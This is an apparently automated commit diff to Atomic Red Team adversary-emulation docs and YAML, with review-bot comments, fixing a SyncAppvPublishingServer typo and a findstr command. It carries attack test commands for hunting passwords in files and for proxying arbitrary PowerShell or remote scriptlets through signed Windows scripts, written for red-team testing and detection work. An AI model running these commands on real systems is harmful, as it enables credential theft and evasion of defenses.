Generate docs from job=validate_atomics_generate_docs branch=master

CircleCI Atomic Red Team doc generator
2020-02-11 21:36:43 +00:00
parent dd4783b2a5
commit f762d6ac0b
5 changed files with 16 additions and 16 deletions
+1 -1
@@ -75,7 +75,7 @@ Extracting Credentials from Files
#### Attack Commands: Run with `powershell`!
```
findstr /si pass *.xml | *.doc | *.txt | *.xls
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -Pattern password
```
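Review bot: the two lines in this block search for different strings (`pass` in the corrected `findstr` line, `password` in the `select-string` line) and neither names a starting directory, so what the test covers depends on whatever working directory the executor starts in. Consider stating the expected working directory in the test description or taking the search root as an input argument, and say whether the pattern difference between the two lines is intended.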
+4 -4
@@ -10,7 +10,7 @@ There are several other signed scripts that may be used in a similar manner. (Ci
- [Atomic Test #1 - PubPrn.vbs Signed Script Bypass](#atomic-test-1---pubprnvbs-signed-script-bypass)
- [Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution](#atomic-test-2---syncappvpublishingserve-signed-script-powershell-command-execution)
- [Atomic Test #2 - SyncAppvPublishingServer Signed Script PowerShell Command Execution](#atomic-test-2---syncappvpublishingserver-signed-script-powershell-command-execution)
- [Atomic Test #3 - manage-bde.wsf Signed Script Command Execution](#atomic-test-3---manage-bdewsf-signed-script-command-execution)
@@ -42,8 +42,8 @@ cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs local
<br/>
<br/>
## Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution
Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command.
## Atomic Test #2 - SyncAppvPublishingServer Signed Script PowerShell Command Execution
Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command.
**Supported Platforms:** Windows
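Review bot: renaming the `## Atomic Test #2 - ...` heading changes the anchor generated from it, so links to the old `#atomic-test-2---syncappvpublishingserve-signed-script-powershell-command-execution` fragment stop resolving. The table-of-contents entry earlier in this file is updated to match; it is worth checking for references outside the generated docs that still use the old fragment.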
@@ -56,7 +56,7 @@ Executes the signed SyncAppvPublishingServe script with options to execute an ar
#### Attack Commands: Run with `command_prompt`!
```
C:\windows\system32\SyncAppvPublishingServe.vbs \n;#{command_to_execute}
C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
```
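Review bot: on the new `SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"` line the substituted value now sits inside double quotes, so a `command_to_execute` value that itself contains a double quote ends the argument early and the test no longer runs what the input says. State that constraint in the input's description, or document the escaping it needs. Minor style point: the path is written `C:\windows\system32` here while the pubprn command in the same file uses `C:\Windows\System32`.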
+2 -2
@@ -378,7 +378,7 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1151 Space after Filename](./T1151/T1151.md)
@@ -789,7 +789,7 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- [T1153 Source](./T1153/T1153.md)
- Atomic Test #1: Execute Script using Source [macos, linux]
+7 -7
@@ -11705,8 +11705,8 @@ defense-evasion:
localhost "script:#{remote_payload}"
'
- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServe script with options
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServer script with options
to execute an arbitrary PowerShell command.
'
@@ -11720,7 +11720,7 @@ defense-evasion:
executor:
name: command_prompt
elevation_required: false
command: 'C:\windows\system32\SyncAppvPublishingServe.vbs \n;#{command_to_execute}
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
'
- name: manage-bde.wsf Signed Script Command Execution
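Review bot: the `command:` value here remains a single-quoted scalar, which is the only thing keeping `\n` a literal backslash-n and letting the newly added double quotes through unescaped; re-quoting the entry with double quotes would silently turn `\n` into a newline. The credential-access entry later in this file already uses a `command: |` block scalar, and using the same form for this command would make the literal intent explicit.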
@@ -19885,7 +19885,7 @@ credential-access:
name: powershell
elevation_required: false
command: |
findstr /si pass *.xml | *.doc | *.txt | *.xls
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -Pattern password
- name: Access unattend.xml
description: 'Attempts to access unattend.xml, where credentials are commonly
@@ -23311,8 +23311,8 @@ execution:
localhost "script:#{remote_payload}"
'
- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServe script with options
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServer script with options
to execute an arbitrary PowerShell command.
'
@@ -23326,7 +23326,7 @@ execution:
executor:
name: command_prompt
elevation_required: false
command: 'C:\windows\system32\SyncAppvPublishingServe.vbs \n;#{command_to_execute}
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
'
- name: manage-bde.wsf Signed Script Command Execution
+2 -2
@@ -170,7 +170,7 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -665,7 +665,7 @@
- Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)